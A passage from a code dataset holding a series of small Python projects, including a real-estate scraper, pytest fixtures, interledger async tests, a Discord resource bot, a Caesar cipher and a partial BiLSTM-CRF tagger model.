counter, result\n\n    return False\n\n\nlist = [[0.2, 0.4], [0.1, 0.3], [0.5, 0.8], [0.6, 0.7], [0.9, 1], [0.6, 0.8], [0, 0.6], [0.7, 1]]\na = uniform(0, 1)\nb = uniform(0, 1)\nc = uniform(0, 1)\nd = uniform(0, 1)\ne = uniform(0, 1)\nf = uniform(0, 1)\ng = uniform(0, 1)\nh = uniform(0, 1)\na1 = uniform(a, 1)\nb1 = uniform(b, 1)\nc1 = uniform(c, 1)\nd1 = uniform(d, 1)\ne1 = uniform(e, 1)\nf1 = uniform(f, 1)\ng1 = uniform(g, 1)\nh1 = uniform(h, 1)\nstart = uniform(0.1, 1)\nstop = uniform(0.6, 1)\nlist1 = [[a, a1], [b, b1], [c, c1], [d, d1], [stop, 1], [e, e1], [0, start], [f, f1], [g, g1], [h, h1]]\nprint(filling_a_span(list1))\n","repo_name":"Gygrus/WDI-ASD-course-Python","sub_path":"Semestr II/Kolokwia/2015-2016/Kolos 3, zadanie 3 - przedział [0, 1], czy można wypełnić.py","file_name":"Kolos 3, zadanie 3 - przedział [0, 1], czy można wypełnić.py","file_ext":"py","file_size_in_byte":3585,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29386349459","text":"import ScrapingUtilities as Su\nfrom concurrent.futures import ThreadPoolExecutor\nimport requests as re\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport datetime\nfrom tqdm import tqdm\n\n\ndef run_it_all():\n    try:\n        complete_dataframe = pd.DataFrame()\n        cities = [\"alba?id=82496862\", \"arad?id=82494820\", \"arges?id=82494624\", \"bacau?id=82495016\", \"bihor?id=82494332\",\n                  \"bistrita-nasaud?id=82501822\", \"botosani?id=82497568\", \"brasov?id=82494170\", \"braila?id=82495458\",\n                  \"bucuresti-ilfov?id=82493726\", \"buzau?id=82495122\", \"caras-severin?id=82495494\", \"calarasi?id=82524120\",\n                  \"cluj?id=82493680\", \"constanta?id=82493534\", \"covasna?id=82500712\", \"dambovita?id=82495344\",\n                  \"dolj?id=82493886\", \"galati?id=82493530\", \"giurgiu?id=82495198\", \"gorj?id=82494826\",\n                  \"harghita?id=82505524\",\n                  \"hunedoara?id=82495282\", \"ialomita?id=82499146\", \"iasi?id=82493900\", \"maramures?id=82496128\",\n                  \"mehedinti?id=82495778\", \"mures?id=82493622\", \"neamt?id=82502954\", \"olt?id=82500594\",\n                  \"prahova?id=82494706\",\n                  \"satu-mare?id=82498096\", \"salaj?id=82506196\", \"sibiu?id=82494094\", \"suceava?id=82495730\",\n                  \"teleorman?id=82500592\", \"timis?id=82493432\", 
\"tulcea?id=82495302\", \"vaslui?id=82495238\",\n \"valcea?id=82495108\", \"vrancea?id=82495300\"]\n for city in tqdm(cities, desc=\"Running...\"):\n base_url = \"https://www.imobiliare.ro/vanzare-apartamente/\" + city\n page_soup = BeautifulSoup(re.get(base_url).content, 'html.parser')\n anunturi = page_soup.find(class_=\"ultima butonpaginare double\")\n if anunturi is None:\n pagina_max = 1\n else:\n attribute_dictionary = anunturi.attrs\n pagina_max = int(attribute_dictionary[\"data-pagina\"])\n\n with ThreadPoolExecutor(max_workers=100) as p:\n # start_time = time.time()\n results = p.map(Su.run_page_beautifulsoup, [city+\"&\"]*pagina_max, range(1, pagina_max+1))\n for result in results:\n complete_dataframe = pd.concat([result, complete_dataframe], ignore_index=True)\n # print(f\"{(time.time() - start_time):.2f} seconds\")\n #\n # for i in range(1, 21):\n # print(\"Run number:\", i)\n # start_time = time.time()\n # result = Su.run_page_beautifulsoup(city, i)\n # complete_dataframe = pd.concat([result, complete_dataframe], ignore_index=True)\n # print(f\"{(time.time() - start_time):.2f} seconds\")\n complete_dataframe.to_csv(\"Reports/\" + datetime.datetime.now().strftime(\"%m-%d-%Y\") + \".csv\", index=False)\n except:\n run_it_all()\n\nif __name__ == \"__main__\":\n run_it_all()","repo_name":"VaseSimion/ImobiliareLaVedere","sub_path":"ScrapingWorkfile.py","file_name":"ScrapingWorkfile.py","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32236651848","text":"# isort: off\nimport asyncio\nfrom os import environ\n\nif environ.get(\"TEST_DATABASE_URL\"):\n environ[\"DATABASE_URL\"] = environ[\"TEST_DATABASE_URL\"]\n\n\nimport pytest\nimport pytest_asyncio\nfrom accentdatabase.config import config\nfrom accentdatabase.engine import engine\nfrom accentdatabase.session import get_session\nfrom accentdatabase.testing import recreate_postgres_database\nfrom alembic import command\nfrom alembic.config import Config\nfrom httpx import AsyncClient\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom sqlalchemy.orm import sessionmaker\n\nfrom app.database import tables\n\nfrom app.main import app\n\n\ndef run_alembic_upgrade(connection, cfg):\n cfg.attributes[\"connection\"] = connection\n command.upgrade(cfg, \"head\")\n\n\n@pytest.fixture(scope=\"session\")\ndef event_loop(request):\n \"\"\"pytest fixture to create an event loop\"\"\"\n\n loop = asyncio.get_event_loop_policy().new_event_loop()\n yield loop\n loop.close()\n\n\n@pytest_asyncio.fixture(name=\"db_setup\", scope=\"session\", autouse=True)\nasync def db_setup_fixture():\n await recreate_postgres_database(config.url)\n\n\n@pytest_asyncio.fixture(name=\"db_migrations\", scope=\"session\", autouse=True)\nasync def db_migrations_fixture(db_setup):\n async with engine.begin() as conn:\n await conn.run_sync(run_alembic_upgrade, Config(\"alembic.ini\"))\n\n # dispose the engine\n await engine.dispose()\n\n\n@pytest_asyncio.fixture(name=\"db_session\")\nasync def db_session_fixture():\n \"\"\"create a sqlalchemy session\"\"\"\n\n # create a sqlalchemy connection\n connection = await engine.connect()\n # begin a new database transaction\n trans = await connection.begin()\n # create a sessionmaker\n async_session = sessionmaker(\n engine,\n expire_on_commit=False,\n class_=AsyncSession,\n )\n # create a new session and bind it to the connection\n # this will ensure that when the transaction is rolled back\n # all calls to the session's 
commit will be rolled back as well\n    async with async_session(bind=connection) as session:\n        yield session\n\n    # rollback the transaction\n    await trans.rollback()\n    # close the connection\n    await connection.close()\n\n\n@pytest_asyncio.fixture(name=\"client\")\nasync def client_fixture(db_session: AsyncSession):\n    \"\"\"the client to use in the tests\"\"\"\n\n    # override the database session for the app\n    # this is to ensure that the database session is always the same\n    # as the one used in the tests so that the session commits are\n    # always rolled back in the session fixture above\n    app.dependency_overrides[get_session] = lambda: db_session\n    # create a client\n    async with AsyncClient(app=app, base_url=\"http://test\") as client:\n        yield client\n    # restore the original database session\n    app.dependency_overrides.clear()\n","repo_name":"stuartaccent/fileserver","sub_path":"src/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"13236751627","text":"#First line of input is space-separated values in L1\r\n#Second line of input is space-separated values in L2\r\n\r\n#For Example:\r\n#a b c d e f g\r\n#b c d\r\n\r\nif __name__ == '__main__':\r\n    d={}\r\n    common=[]\r\n    l1=[str(x) for x in input().split()]\r\n    l2 = [str(x) for x in input().split()]\r\n    for x in l1:\r\n        if(x not in d):\r\n            d[x] = 1\r\n    for x in l2:\r\n        if(x in d):\r\n            common.append(x)\r\n            d.pop(x)\r\n    print (\"Common elements are: \"+str(common))\r\n    onlyA = [str(x) for x in d]\r\n    print (\"Elements present only in L1 are: \"+str(onlyA))","repo_name":"adityakrshnn/NAS","sub_path":"p01Generic.py","file_name":"p01Generic.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"9297254611","text":"#Safian Omar Qureshi\n#ID 10086638\n#TA: Mojtaba Komeili\n#T03\n#v1.60 (last modified 4:39pm, June 26, 2017)\n\n#This file in conjunction with Target.py and Pursuer.py creates objects that interact with each other.\n#The Target object generates a user-entered probability of a true/false event. The Pursuer also\n#generates a true/false event that is initially set to 50/50. After each interaction, the Pursuer\n#modifies its probability to create better matching results. A final statistic report is then displayed.\n\n#Limitations: the ctrl+c break-out-of-loop command is handled by the exception handler and so\n#it doesn't break the loop. This can make it a little annoying to debug if you need to check the functions.\n\n#I also had trouble getting a globals.py named-constant file that could be read across all files. It would be\n#convenient to have a separate named-constants file, but I tried that and it didn't work. So I copy-pasted\n#my named constants at the top of all files. 
\n\n\nfrom Target import *\nfrom Pursuer import *\nLOWER_BOUND_RANDOM=0 #i tried to create a globals.py files with all the named constants\nUPPER_BOUND_RANDOM=100#so that all files can use it simultanesouly but couldnt\nCOUNT_STEP=1#get it to work for some reason so i just repeated the starting constants\nSTARTING_COUNTER=0 #for each file \n\ndef interactionsChecker(): #this function checks user input by recursion\n try:\n interactions=int(input(\"Enter amount of dates (1 or more): \"))\n if interactions<1:\n print(\"Number must be greater than 0, try again!\")\n interactions=interactionsChecker()\n except:\n print(\"Non numerical input - Try again!\")\n interactions=interactionsChecker()\n return(interactions)\n\n\ndef probabilityChecker():#this function checks user input by recursion\n aTarget=Target()\n try:\n aTarget.xIntProb=int(input(\"Enter the probability of x (0 - 100): \"))\n if aTarget.xIntProbUPPER_BOUND_RANDOM:\n print(\"Number must be between 0 - 100, try again!\")\n aTarget.xIntProb=probabilityChecker()\n except:\n print(\"Non numerical input - Try again!\")\n aTarget.xIntProb=probabilityChecker()\n return(aTarget.xIntProb)\n\n\ndef start():\n aTarget=Target() #initializes both objects\n aPursuer=Pursuer() \n\n interactions=interactionsChecker() #calling these two functions to check user is stupid \n aTarget.xIntProb=probabilityChecker()\n\n interactionsCount = STARTING_COUNTER\n numTotMatches=STARTING_COUNTER\n\n while (interactionsCount Responder -> Ledger\n#\n\n# # # Local view\n# #\n# # MockInitiator <- Interledeger -> MockResponder\n#\n\nclass MockInitiator:\n\n def __init__(self, events: List):\n self.events = events\n self.ledger_type = LedgerType.ETHEREUM\n\n async def listen_for_events(self):\n result = []\n if len(self.events) > 0:\n result = self.events.copy()\n self.events.clear()\n return result\n \n async def commit_sending(self, id: str):\n return {\"commit_status\": True, \"commit_tx_hash\" : '0x111'}\n\n async def abort_sending(self, id: str, reason: int):\n return {\"abort_status\": True, \"abort_tx_hash\" : '0x222'}\n\n\n# Responder which getting positive result\n\nclass MockResponder:\n\n def __init__(self):\n self.events = []\n self.ledger_type = LedgerType.ETHEREUM\n\n async def send_data(self, nonce: str, data: bytes):\n\n return {\"status\": 42}\n\n\n# Responder which getting negative result\n\nclass MockResponderAbort:\n\n async def send_data(self, nonce: str, data: bytes):\n\n return {\"status\": False}\n\n\n\n#\n# Test receive_transfer\n#\n\n@pytest.mark.asyncio\nasync def test_interledger_receive_transfer():\n\n t = Transfer()\n t.payload = {}\n init = MockInitiator([t])\n resp = MockResponder()\n interledger = Interledger(init, resp)\n # interledger.test_interrupt = True\n\n task = asyncio.ensure_future(interledger.receive_transfer()) \n assert task.done() == False\n l = await task\n\n assert init.events == []\n assert len(interledger.transfers) == 1\n assert l == 1\n assert interledger.transfers[0].state == State.READY\n\n##############################\n\n\n#\n# Test send_transfer\n#\n@pytest.mark.asyncio\nasync def test_interledger_send_transfer():\n\n t = Transfer()\n t.payload = {}\n t.payload['nonce'] = str(uuid4().int)\n t.payload['data'] = b\"dummy\"\n i = Interledger(MockInitiator([]), MockResponder())\n\n i.transfers = [t]\n\n task = asyncio.ensure_future(i.send_transfer())\n assert task.done() == False\n await task\n\n assert len(i.transfers_sent) == 1\n \n tr = i.transfers[0]\n assert tr.state == State.SENT\n assert 
asyncio.isfuture(tr.send_task)\n\n await tr.send_task\n assert tr.send_task.done() == True\n\n#\n# Test transfer_result\n#\n@pytest.mark.asyncio\nasync def test_interledger_transfer_result():\n\n async def foo():\n return 42\n\n i = Interledger(MockInitiator([]), MockResponder())\n \n t = Transfer()\n t.state = State.SENT\n t.send_task = asyncio.ensure_future(foo())\n i.transfers_sent = [t]\n \n task = asyncio.ensure_future(i.transfer_result())\n assert task.done() == False\n await task\n\n assert len(i.transfers_sent) == 0\n assert len(i.transfers_responded) == 1\n tr = i.transfers_responded[0]\n assert tr.state == State.RESPONDED\n assert tr.result == 42\n\n\n#\n# Test transfer_result with a commit\n# - need ad-hoc commit future\n#\n@pytest.mark.asyncio\nasync def test_interledger_process_result_commit():\n\n i = Interledger(MockInitiator([]), MockResponder())\n \n t = Transfer()\n t.payload = {}\n t.payload['id'] = str(uuid4().int)\n t.state = State.RESPONDED\n t.result = {\"status\": True}\n i.transfers_responded = [t]\n\n task = asyncio.ensure_future(i.process_result())\n assert task.done() == False\n await task\n\n tr = i.results_committing[0]\n assert tr.state == State.CONFIRMING\n assert tr.result['status'] == True\n assert len(i.results_commit) == 0\n assert len(i.results_abort) == 0\n \n assert len(i.transfers_responded) == 0\n\n#\n# Test transfer_result with an abort\n#\n@pytest.mark.asyncio\nasync def test_interledger_process_result_abort():\n\n i = Interledger(MockInitiator([]), MockResponder())\n \n t = Transfer()\n t.payload = {}\n t.payload['id'] = str(uuid4().int)\n t.state = State.RESPONDED\n t.result = {\"status\": False}\n i.transfers_responded = [t]\n \n task = asyncio.ensure_future(i.process_result())\n assert task.done() == False\n await task\n\n tr = i.results_aborting[0]\n assert tr.state == State.CONFIRMING\n assert tr.result['status'] == False\n assert len(i.results_commit) == 0\n assert len(i.results_abort) == 0\n\n assert len(i.transfers_responded) == 0\n\n\n#\n# Test confirm_transfer with a commit\n#\n@pytest.mark.asyncio\nasync def test_interledger_confirm_transfer_commit():\n async def foo():\n return {'commit_status': True,\n 'commit_tx_hash': '0x333'}\n\n i = Interledger(MockInitiator([]), MockResponder())\n\n t = Transfer()\n t.payload = {}\n t.payload['id'] = str(uuid4().int)\n t.result = {}\n t.state = State.CONFIRMING\n t.confirm_task = asyncio.ensure_future(foo())\n i.results_committing = [t]\n \n task = asyncio.ensure_future(i.confirm_transfer())\n assert task.done() == False\n await task\n\n res = i.results_commit[0]\n assert t.state == State.FINALIZED\n assert res['commit_status'] == True\n assert res['commit_tx_hash'] == '0x333'\n assert len(i.results_commit) == 1\n assert len(i.results_abort) == 0\n\n assert len(i.results_committing) == 0\n\n\n#\n# Test confirm_transfer with an abort\n#\n@pytest.mark.asyncio\nasync def test_interledger_confirm_transfer_abort():\n async def foo():\n return {'abort_status': True,\n 'abort_tx_hash': '0x444'}\n\n i = Interledger(MockInitiator([]), MockResponder())\n\n t = Transfer()\n t.payload = {}\n t.payload['id'] = str(uuid4().int)\n t.result = {}\n t.state = State.CONFIRMING\n t.confirm_task = asyncio.ensure_future(foo())\n i.results_aborting = [t]\n \n task = asyncio.ensure_future(i.confirm_transfer())\n assert task.done() == False\n await task\n\n res = i.results_abort[0]\n assert t.state == State.FINALIZED\n assert res['abort_status'] == True\n assert res['abort_tx_hash'] == '0x444'\n assert 
len(i.results_abort) == 1\n    assert len(i.results_commit) == 0\n\n    assert len(i.results_aborting) == 0\n\n# ##############################\n\n# #\n# # Test run\n# # - with no cleanup\n# # - with cleanup\n# #\n \n@pytest.mark.asyncio\nasync def test_interledger_run_no_cleanup():\n\n    l1, l2, l3 = [], [], []\n    for i in range(4):\n        t1, t2, t3 = Transfer(), Transfer(), Transfer()\n        t1.payload, t2.payload, t3.payload = {}, {}, {}\n        t1.payload['nonce'], t1.payload['id'], t1.payload['data'] = str(uuid4().int), '1', b\"dummy1\"\n        t2.payload['nonce'], t2.payload['id'], t2.payload['data'] = str(uuid4().int), '2', b\"dummy2\"\n        t3.payload['nonce'], t3.payload['id'], t3.payload['data'] = str(uuid4().int), '3', b\"dummy3\"\n        l1.append(t1)\n        l2.append(t2)\n        l3.append(t3)\n\n    init = MockInitiator(l1)\n    i = Interledger(init, MockResponder())\n\n    with patch(\"data_transfer.interledger.Interledger.cleanup\") as mock_cleanup:\n\n        task = asyncio.ensure_future(i.run())\n\n        time = 0.5\n        # Consume l1\n        await asyncio.sleep(time) # Simulate interledger running\n\n        # New events\n        init.events = l2\n        # Consume l2\n        await asyncio.sleep(time) # Simulate interledger running\n\n        # New events\n        i.responder = MockResponderAbort()\n        init.events = l3\n        # Consume l3, but with a responder returning False -> abort\n        await asyncio.sleep(time) # Simulate interledger running\n\n        assert len(i.transfers) == 12\n        assert len(i.transfers_sent) == 0\n        assert len(i.transfers_responded) == 0\n        assert len(i.results_committing) == 0\n        assert len(i.results_aborting) == 0\n        assert len(i.results_commit) == 8\n        assert len(i.results_abort) == 4\n\n    i.stop()\n    await task\n\n@pytest.mark.asyncio\nasync def test_interledger_run_with_cleanup():\n\n    l1, l2, l3 = [], [], []\n    for i in range(4):\n        t1, t2, t3 = Transfer(), Transfer(), Transfer()\n        t1.payload, t2.payload, t3.payload = {}, {}, {}\n        t1.payload['nonce'], t1.payload['id'], t1.payload['data'] = str(uuid4().int), '1', b\"dummy1\"\n        t2.payload['nonce'], t2.payload['id'], t2.payload['data'] = str(uuid4().int), '2', b\"dummy2\"\n        t3.payload['nonce'], t3.payload['id'], t3.payload['data'] = str(uuid4().int), '3', b\"dummy3\"\n        l1.append(t1)\n        l2.append(t2)\n        l3.append(t3)\n\n    init = MockInitiator(l1)\n    i = Interledger(init, MockResponder())\n\n    task = asyncio.ensure_future(i.run())\n\n    time = 0.5\n    # Consume l1\n    await asyncio.sleep(time) # Simulate interledger running\n\n    # New events\n    init.events = l2\n    # Consume l2\n    await asyncio.sleep(time) # Simulate interledger running\n\n    # New events\n    i.responder = MockResponderAbort()\n    init.events = l3\n    # Consume l3, but with a responder returning False -> abort\n    await asyncio.sleep(time) # Simulate interledger running\n\n    assert len(i.transfers) == 0\n    assert len(i.transfers_sent) == 0\n    assert len(i.transfers_responded) == 0\n    assert len(i.results_committing) == 0\n    assert len(i.results_aborting) == 0\n    assert len(i.results_commit) == 8\n    assert len(i.results_abort) == 4\n\n    i.stop()\n    await task\n","repo_name":"SOFIE-project/ARD-Implementation","sub_path":"tests/integration/test_interledger.py","file_name":"test_interledger.py","file_ext":"py","file_size_in_byte":9414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21504262187","text":"from math import pi\nprint(\"Enter the radius of a sphere: \")\nr = input()\n\nvolumen = 4/3*pi*pow(int(r),3)\nprint(\"Volume:\", volumen)\n\n\"\"\"\nOutput with input=6 :\n    Volume: 
904.7786842338603\n\"\"\"","repo_name":"agustinc24/datascience_unsam","sub_path":"Clase 1/esfera.py","file_name":"esfera.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14008458828","text":"import dash_core_components as dcc\nimport dash_html_components as html\n\noptions_metrics = [\n 'RRMSE'\n , 'RMSE'\n , 'MARE'\n , 'R2'\n]\noptions_methos = [\n 'MLP'\n , 'DT'\n , 'RF'\n]\n\n\ndef layout():\n return [\n 'Select Metric:'\n , dcc.Dropdown(\n id='drp_options_metrics'\n # , style={'width': '30%', 'display': 'inline-block'}\n , options=[dict(label=e, value=e) for e in options_metrics]\n , multi=False\n , value=options_metrics[0]\n )\n , 'Select Methods:'\n , dcc.Dropdown(\n id='drp_options_methods_1'\n , style={'width': '25%', 'display': 'inline-block'}\n , options=[dict(label=e, value=e) for e in options_methos]\n , multi=False\n , value=options_methos[0]\n )\n , dcc.Dropdown(\n id='drp_options_methods_2'\n , style={'width': '25%', 'display': 'inline-block'}\n , options=[dict(label=e, value=e) for e in options_methos]\n , multi=False\n , value=options_methos[0]\n )\n , dcc.Dropdown(\n id='drp_options_methods_3'\n , style={'width': '25%', 'display': 'inline-block'}\n , options=[dict(label=e, value=e) for e in options_methos]\n , multi=False\n , value=options_methos[0]\n )\n , html.Button('Plot', id='bnt_plot')\n ]\n","repo_name":"ealcobaca/mlglass","sub_path":"source/vis/web_dash/layout/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"25188628578","text":"from sys import maxsize\n \ndef func(array,n):\n \n ans = -maxsize - 1\n curr = 0\n i = 0\n j = 0\n s = 0\n \n for i in range(0,n):\n \n curr += int(array[i])\n \n if(ans < curr):\n ans = curr\n i = s\n j = i\n \n if(curr < 0):\n curr = 0\n s = i+1\n\n return ans\n\n \n \n\nfor _ in range(int(input())):\n n = int(input())\n array = input().split(\" \")\n\n ans = func(array,n)\n if(ans<=0):\n print(\"Cannot study - \",ans)\n else:\n print(\"Can study - \",ans)","repo_name":"its-sachin/CodeChef","sub_path":"6-08/q4.py","file_name":"q4.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"28324759697","text":"import src.nitegame as ng\nfrom src.nitegame.locals import *\n\nif __name__ == \"__main__\":\n # Initialize\n ng.init()\n\n display = ng.GLDisplay()\n running = True\n\n im = ng.InputManager()\n im.bind_defaults()\n\n # Main Loop\n while running:\n # Event\n running = im.update_inputs()\n\n if im.inputs[\"QuickExit\"].released:\n running = False\n\n # Update\n\n # Draw\n display.clear()\n\n display.update()\n","repo_name":"Nitebound/Nitegame-Engine","sub_path":"tests/core/test_gldisplay.py","file_name":"test_gldisplay.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32517948021","text":"# resources-bot\nfrom heapq import nsmallest\nimport os\nfrom pprint import pformat\n\nimport discord\nfrom discord.ext import commands, tasks\nfrom dotenv import load_dotenv\n\nfrom resources.resources import get_current_csv, GHServer\n\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\nprint(TOKEN)\nclient = discord.Client()\n\n## Configurations\n\n# channel names that this bot will send 
to\nallowed_channel_names = [\n 'resources-bot'\n]\n\n## End configurations\n\ndef get_compatible_channels():\n channel_ids = []\n for guild in client.guilds:\n print(f'found guild: {guild.name}')\n for channel in guild.channels:\n print(f'found channel: {channel.name}')\n if channel.name in allowed_channel_names:\n channel_ids.append(channel.id)\n return channel_ids\n\n@tasks.loop(minutes=15)\nasync def called_once_an_hour():\n channel_ids = get_compatible_channels()\n for channel_id in channel_ids:\n channel = client.get_channel(channel_id)\n # await channel.send('test')\n\n print('getting new data')\n new_rows = get_current_csv()\n num_new_rows = len(new_rows)\n print(f'{num_new_rows} new resources')\n for n in new_rows:\n\n # remove things useless to a human\n n.pop('galaxy_id')\n n.pop('type_id')\n n.pop('group_id')\n\n # reformat some things\n\n # make name a hyper link to GH\n n['link'] = f'https://galaxyharvester.net/resource.py/{GHServer.FINALIZER.value}/{n[\"name\"]}'\n\n # Endor|Yavin 4 -> Endor, Yavin4\n n['planets'] = ','.join(n['planets'].split('|')) \n\n n_str = '\\n'.join([f'{k}: {v}' for k,v in n.items()])\n print(n_str)\n await channel.send(f'**A new resource has been verified on Galaxy Harvestor:**\\n{n_str}')\n\n@client.event\nasync def on_ready():\n print(f'{client.user} has connected to Discord!')\n for guild in client.guilds:\n print(f'In guild: {guild.name}')\n \n\ncalled_once_an_hour.start()\n\nclient.run(TOKEN)","repo_name":"ehrenb/swgops","sub_path":"resources/resources/src/resources-bot.py","file_name":"resources-bot.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22086074042","text":"# Optimized CaesarCipher code using formula, very readable.\n# Encryption E(p) = (p + k) mod 26\n# Decryption D(c) = (c - k) mod 26\nimport string\nlibrary, res = string.ascii_lowercase, []\nuserText, k = str(input(\"Enter plain/cipher text :\\t\")), int(input(\"Enter Key :\\t\"))\nchoice = True if input(\"Press E for encryption or D for decryption :\\t\").lower() == 'e' else False\nfor letter in userText:\n if letter not in library:\n res.append(letter)\n else:\n if choice:\n res.append(library[(library.index(letter) + k) % 26])\n else:\n res.append(library[(library.index(letter) - k) % 26])\nprint(''.join(res).upper())\n","repo_name":"strenuousnerd8/Code","sub_path":"CaesarCipherOpti.py","file_name":"CaesarCipherOpti.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"26566392784","text":"import celery\n\nfrom xtas.tasks.es import is_es_document, es_address\nfrom xtas.tasks.es import get_single_result, store_single, fetch\nfrom xtas.core import app\n\n\ndef pipeline(doc, pipeline, store_final=True, store_intermediate=False,\n block=True):\n \"\"\"\n Get the result for a given document.\n Pipeline should be a list of dicts, with members task and argument\n e.g. 
[{\"module\" : \"tokenize\"},\n {\"module\" : \"pos_tag\", \"arguments\" : {\"model\" : \"nltk\"}}]\n @param block: if True, it will block and return the actual result.\n If False, it will return an AsyncResult unless the result was\n cached, in which case it returns the result immediately (!)\n @param store_final: if True, store the final result\n @param store_intermediate: if True, store all intermediate results as well\n \"\"\"\n # form basic pipeline by resolving task dictionaries to task objects\n tasks = [_get_task(t) for t in pipeline]\n\n if is_es_document(doc):\n idx, typ, id, field = es_address(doc)\n chain = []\n input = None\n # Check cache for existing documents\n # Iterate over tasks in reverse order, check cached result, and\n # otherwise prepend task (and cache store command) to chain\n for i in range(len(tasks), 0, -1):\n taskname = \"__\".join(t.task for t in tasks[:i])\n input = get_single_result(taskname, idx, typ, id)\n if input:\n break\n if (i == len(tasks) and store_final) or store_intermediate:\n chain.insert(0, store_single.s(taskname, idx, typ, id))\n chain.insert(0, tasks[i-1])\n if not chain: # final result was cached, good!\n return input\n elif input is None:\n input = fetch(doc)\n else:\n # the doc is a string, so we can't use caching\n chain = tasks\n input = doc\n\n chain = celery.chain(*chain).delay(input)\n if block:\n return chain.get()\n else:\n return chain\n\n\ndef _get_task(task_dict):\n \"Create a celery task object from a dictionary with module and arguments\"\n task = task_dict['module']\n if isinstance(task, (str, unicode)):\n task = app.tasks[task]\n args = task_dict.get('arguments')\n if isinstance(args, dict):\n return task.s(**args)\n elif args:\n return task.s(*args)\n else:\n return task.s()\n","repo_name":"NLeSC/xtas","sub_path":"xtas/tasks/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"52"} +{"seq_id":"22722520061","text":"import numpy as np\nimport os\nimport preprocess_em\nimport preprocess_update\nimport utils\nimport torch\nfrom torch import nn\nfrom torchcrf import CRF\n\n\nclass Bilstm_crf(nn.Module):\n def __init__(self, vocab_size, tag_to_id, id_to_tag, embedding_dim, hidden_dim,\n pretrained_weight1, pretrained_weight2, batch_size, drop_out, num_steps,\n id2word):\n super(Bilstm_crf, self).__init__()\n self.vocab_size = vocab_size\n self.tag_to_id = tag_to_id\n self.id_to_tag = id_to_tag\n self.embedding_dim = embedding_dim\n self.hidden_dim = hidden_dim\n self.label_size = len(tag_to_id)\n self.batch_size = batch_size\n self.drop0 = nn.Dropout(p=drop_out/2)\n self.drop = nn.Dropout(p=drop_out)\n # self.relu = nn.ReLU()\n self.num_steps = num_steps\n self.id2word = id2word\n # self.batch_norm1 = nn.BatchNorm1d(num_features=120)\n # self.batch_norm2 = nn.BatchNorm1d(num_features=120)\n # self.batch_norm3 = nn.BatchNorm1d(num_features=120)\n self.batch_norm0 = nn.BatchNorm1d(num_features=270)\n self.batch_norm1 = nn.BatchNorm1d(num_features=512)\n # self.start_tag = ''\n\n self.word_embeds1 = nn.Embedding.from_pretrained(pretrained_weight1, freeze=False)\n # self.word_embeds1.weight.requires_grad = True\n self.second_word_embeds1 = nn.Embedding.from_pretrained(pretrained_weight1, freeze=False)\n\n self.word_embeds2 = nn.Embedding.from_pretrained(pretrained_weight2, freeze=False)\n # self.word_embeds2.weight.requires_grad = True\n self.second_word_embeds2 = nn.Embedding.from_pretrained(pretrained_weight1, 
freeze=False)\n\n self.pos_embeds = nn.Embedding(num_embeddings=num_steps, embedding_dim=40)\n self.second_pos_embeds = nn.Embedding(num_embeddings=num_steps, embedding_dim=40)\n\n self.char_pos_embeds = nn.Embedding(num_embeddings=11, embedding_dim=30,\n padding_idx=10)\n self.second_char_pos_embeds = nn.Embedding(num_embeddings=11, embedding_dim=30,\n padding_idx=10)\n\n # self.sin_embeds = nn.Embedding(num_embeddings=11, embedding_dim=25)\n # self.cos_embeds = nn.Embedding(num_embeddings=11, embedding_dim=25)\n\n # transformer-like position embedding\n self.trig_pos = utils.get_pos_trig_emb(num_steps, 200)\n self.trig_pos_embeds = nn.Embedding.from_pretrained(self.trig_pos, freeze=True)\n\n self.conv0 = nn.Conv1d(in_channels=embedding_dim + 270, out_channels=256,\n kernel_size=(9,), padding=(4,))\n self.conv1 = nn.Conv1d(in_channels=embedding_dim + 270, out_channels=256,\n kernel_size=(7,), padding=(3,))\n\n # self.conv2 = nn.Conv1d(in_channels=250, out_channels=250,\n # kernel_size=(9,), padding=(4,))\n\n self.rnn1 = nn.LSTM(input_size=embedding_dim + 70, hidden_size=200, num_layers=1,\n batch_first=True, bidirectional=True)\n self.rnn2 = nn.LSTM(input_size=512, hidden_size=hidden_dim, num_layers=1,\n batch_first=True, bidirectional=True)\n\n self.multi_attn1 = nn.MultiheadAttention(embed_dim=(200+hidden_dim) * 2, num_heads=10, dropout=drop_out)\n self.multi_attn2 = nn.MultiheadAttention(embed_dim=(200+hidden_dim) * 2, num_heads=10, dropout=drop_out)\n\n # self.hidden1_2 = nn.Linear(hidden_dim*2, hidden_dim)\n # self.hidden2_tag = nn.Linear(hidden_dim, self.target_size)\n # self.attn1_tag = nn.Linear(hidden_dim * 2, self.label_size)\n # self.attn2_tag = nn.Linear(hidden_dim * 2, self.label_size)\n # self.rnn_tag = nn.Linear(hidden_dim * 2, self.label_size)\n self.batch_norm_ffnn = nn.BatchNorm1d(num_features=(200+hidden_dim) * 